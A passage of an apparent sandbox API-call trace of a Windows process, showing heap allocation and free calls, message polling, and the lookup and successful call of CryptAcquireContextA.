[0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0241.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0241.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0241.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0241.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0241.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0241.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0241.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.379] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0241.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0241.383] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0241.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0241.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0241.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0241.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0241.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ba8 [0241.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0241.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0241.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0241.383] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0241.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0241.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0241.384] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0241.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0241.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0241.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.387] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0241.387] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0241.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0241.388] PeekMessageW (in: 